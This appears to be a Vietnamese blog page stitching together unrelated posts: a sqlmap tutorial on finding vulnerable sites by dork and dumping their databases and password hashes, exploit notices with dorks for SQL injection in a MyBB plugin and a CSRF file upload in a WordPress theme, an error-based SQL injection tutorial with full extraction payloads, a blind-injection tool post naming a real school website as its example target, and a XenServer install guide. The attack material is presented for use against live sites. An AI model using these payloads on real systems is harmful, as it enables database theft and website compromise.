Trang

Hướng dẫn sử dụng SqlMap Backtrack 5

Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.

Quote:
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.

1. Open up sqlmap
This image has been resized.Click to view original image

2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes
Quote:
./sqlmap.py -u website.com/index.php?id=? --dbs
With this command, you’ll be able to extract the databases.
Looks like this:


3. Once we have the DBS, it’s time to get the tables.
Quote:
./sqlmap website.php/index.php?id=? -D [dbname] --tables
4. After we get the tables which looks like this:

We need to get the columns.
Now, we need to write:
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
5. Once we get the columns
This image has been resized.Click to view original image

We need to dump the files.
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump
Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username --dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
http://uploading.com/ee6e71ed/hash-py
1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
Quote:
/root/hash.py
We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.
 

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected] - [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Fb Page : https://www.facebook.com/pages/Explo...99266860256538

# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2

# Security Risk : High

# Tested on : Linux

# Dork : inurl:ajaxfs.php

#################################

1)

if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");


2)

if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Google DORK : inurl:ajaxfs.php


# Exploit :

# http://site.com/mybb/ajaxfs.php?tooltip=[sql]

# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]


#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################
 

Tool] Quick Blind SQL Injection script

Đây là script được code bằng python…Tự động khai thác dạng sql injection quick blind

Điều kiện: cài python và wget cho python

Gồm 2 class…(thật ra 1 cũng được nhưng để dành phát triển) và 1 hàm main

Các bạn có chỉnh sửa gì cứ mở file main.py ra sửa nha.

Ví dụ:

inject_link = ‘http://edu.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=26&p3=4331 ‘

Các bạn có thể đổi thành site xpath bất kỳ với định dạng caigido=sogido (sorry, mới làm được dạng này)

Lang man quá, đây là link tải Big Grin

sqli: Base class

sqli quick blind: Quick blind exploit

main application

Demo:





















































[Hình: Untitled12.png]
 

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng:

http://target.com/page.php?id = 1

Lệnh get version, database

http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color]

Tương tự vậy, lệnh get table:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….)

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),63,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tiếp theo, lấy column của một table nào đó

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=0xso_hex_cua_tablename) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tăng số 1 theo nguyên tắc như trên.

Và cuối cùng là dữ liệu:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

CEH
 

Backdoor trong modem D-Link và khai thác

Một người bạn đã đưa cho tôi bài viết này.

Backdoor trong modem D-Link và khai thác với chrome

reverse engineering đối với firmware của modem D-Link và phát hiện trong đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem D-Link.

Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng:


Mã:
 

WordPress Curvo Themes - CSRF File Upload

################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
################################################## #################################################

# Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path:
http://site.com/wordpress/wp-content/uploads/[FILE]
or
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]
 

Hướng dẫn cài đặt XenServer 6 và XenCenter

Yêu cầu hệ thống

XenServer chạy trực tiếp trên phần cứng đồng nghĩa với việc sẽ không có bất cứ thứ gì nằm giữa phần cứng và XenServer. Nói cách khác, XenServer đúng nghĩa là một hệ điều hành. Nó sẽ giao tiếp trực tiếp với phần cứng, gồm cả card mạng (NIC) và bộ điều khiển lưu trữ.

Chương trình yêu cầu CPU 64 bit kích hoạt Intel VT hoặc AMD-V. Nhưng, đây chỉ là khuyến nghị từ nhà cung cấp. XenServer vẫn có thể được cài nếu CPU không được kích hoạt Intel VT hay AMD-V. Tuy nhiên, các tiện ích và tính năng sẽ bị hạn chế.

Nhớ rằng, XenServer là một chương trình ảo hóa một phần. Nó sử dụng kỹ thuật ảo hóa một phần trong ảo hóa server. Do đó, chương trình đòi hỏi bộ xử lý trên server vật lý có khả năng thực hiện công nghệ ảo hóa để ta có thể tận dụng hết khả năng của nó.

Người dùng cần tối thiểu 2GB RAM chỉ để cài đặt XenServer, nhưng theo khuyến nghị, nên sử dụng ít nhất 8GB RAM, đặc biệt nếu người dùng dự định tạo nhiều máy ảo trên đó. Bản thân XenServer yêu cầu 16GB bộ nhớ nhưng, ta sẽ cần nhiều không gian hơn cho máy ảo.

Chương trình có thể hoạt động với một bộ điều khiển NIC 100Mb. Tuy nhiên, bộ điều khiển một Gigabit hay thậm chí 10Gigabit được khuyến nghị.

Phần cứng cho XenServer

Có thể đặt 1TB RAM, 16 NIC và 64 bộ xử lý logic trên một máy chủ (host) vật lý chạy XenServer. Nhớ rằng các bộ xử lý logic là sự kết hợp của nhiều lõi.

Hãy kiểm tra danh sách phần cứng tương thích (HCL) tại hcl.xensource.com trước khi trả tiền mua phần cứng hay thiết bị ngoại vi dự đính gắn vào server.

Trong hầu hết trường hợp, khi người dùng tìm đến một nhà cung cấp phần mềm và bảo cho họ cái mình định làm với server (ví dụ làm XenServer), trước hết, nhà cung cấp sẽ kiểm tra tính tương thích. Tuy nhiên, hãy kiểm tra các phần cứng như thiết bị ngoại vi, NIC… trong HCL để tránh những phát sinh trong quá trình cài đặt và sử dụng sau đó.

XenServer thực ra được cài trên phần cứng lớp server. Tuy nhiên, do là một bản phân phối Linux và do đang sử dụng kỹ thuật ảo hóa một phần nên nó có thể tương thích với nhiều loại máy để bàn hay thậm chí là laptop.

Vì vậy, nếu muốn thử nghiệm, người dùng có thể cài XenServer lên một laptop hay trên một máy trạm, chương trình sẽ vẫn hoạt động.

Tải Citrix XenServer 6 và XenCenter

Tải XenServer và XenCenter từ http://www.citrix.com/xenserver. Hoặc nếu có tài khoản MyCitrix, bạn có thể truy cập vào http://www.citrix.com/mycitrix để tải chương trình.

XenServer có dung lượng 508MB (file đuôi ISO) và XenCenter là 41MB.

Cài đặt XenServer thì nhanh và dễ dàng. Sau đây là các bước cài đặt:

Ghi file ISO vào một đĩa CD và cho đĩa vào ổ đĩa quang hoặc bung file bằng phần mềm như MagicISO.
Hãy đảm bảo VT (hay AMD-V) được kích hoạt trong BIOS của server.
Khởi động từ đĩa CD.
Đáp ứng các truy vấn thiết lập cơ bản và khởi động lại.
Thực hiện những cấu hình ban đầu, như gán địa chỉ IP, host name, mật khẩu…
Kết nối vào XenServer qua XenCenter.


Quá trình cài đặt chỉ mất khoảng 10 phút.
Yêu cầu cài đặt XenCenter

Citrix XenCenter là một ứng dụng nền Windows có thể được cài trên máy thật hoặc máy ảo.

Chương trình tương thích với bất cứ phiên bản Windows nào: Windows XP, Vista, 7, Server 2003, 2008 và 2008RC. XenCenter yêu cầu .NET Framework 3.5.

Yêu cầu được khuyến nghị như sau: Tần số 1GHz, RAM tối thiểu 2GB, tốc độ NIC ít nhất 100Mbps và độ phân giải màn hình tối thiểu 1024x768. Chương trình chiếm 100MB không gian đĩa cứng.
Cài đặt XenServer
http://www.thuvien-it.net/home/tinhoc/vi...eadid=7978
 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương